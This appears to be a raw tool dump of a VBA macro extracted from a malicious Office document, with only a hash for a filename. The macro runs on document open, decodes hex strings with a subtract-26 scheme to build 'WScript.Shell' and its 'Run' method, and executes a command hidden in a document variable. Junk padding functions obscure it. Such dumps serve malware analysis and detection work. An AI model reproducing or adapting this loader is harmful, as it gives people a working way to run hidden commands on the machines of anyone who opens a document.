Filename     : ./macros/c5e29fb14d8bcbc1b44e4c1bf04b66b6928115d82929288bf98eed8acfb12bcf
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function WUMDNZM() As String
Dim aWUMDNZM As String
aWUMDNZM = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim reWUMDNZM = aWUMDNZM
Dim reMsgBox(Mid(aWUMDNZM & reWUMDNZM, 28))
End Function

Public Function DV_(ByVal RXI_ As String)
   Dim V_ As String
   Dim XHJ_ As Long
   For XHJ_ = 1 To Len(RXI_) Step 2
        Dim G_ As Long: G_ = CLng(Chr(38) & Chr(72) & Mid(RXI_, XHJ_, 2))
        V_ = V_ & Chr(G_ - 26)
   Next
   DV_ = V_
End Function
Private Function PJIJVMM() As String
Dim aPJIJVMM As String
aPJIJVMM = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim rePJIJVMM = aPJIJVMM
Dim reMsgBox(Mid(aPJIJVMM & rePJIJVMM, 28))
End Function

Sub BRBNF_()
    XDX_
End Sub
Private Function GSNESQD() As String
Dim aGSNESQD As String
aGSNESQD = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim reGSNESQD = aGSNESQD
Dim reMsgBox(Mid(aGSNESQD & reGSNESQD, 28))
End Function

Public Sub Document_Open()
    Application.Run DV_("5C6C5C686079")
End Sub
Private Function NFJVXOW() As String
Dim aNFJVXOW As String
aNFJVXOW = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim reNFJVXOW = aNFJVXOW
Dim reMsgBox(Mid(aNFJVXOW & reNFJVXOW, 28))
End Function

Sub Workbook_Open()
    BRBNF_
End Sub
Private Function KQSMGZP() As String
Dim aKQSMGZP As String
aKQSMGZP = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim reKQSMGZP = aKQSMGZP
Dim reMsgBox(Mid(aKQSMGZP & reKQSMGZP, 28))
End Function

Public Sub XDX_()
    Dim RXI_ As Object: Set RXI_ = VBA.CreateObject(DV_("716D7D8C838A8E486D827F8686"))
    CallByName RXI_, DV_("6C8F88"), VbMethod, DV_(ActiveDocument.Variables("YUMHYDKE").Value), 0, True
End Sub
Private Function TUDMIJI() As String
Dim aTUDMIJI As String
aTUDMIJI = "3E4566669A4D9266974BA4486B5666666681858E9C67845F7E666666968B556648A44D496666526634663C80666658416666537266666A9C7CA67F"
Dim reTUDMIJI = aTUDMIJI
Dim reMsgBox(Mid(aTUDMIJI & reTUDMIJI, 28))
End Function

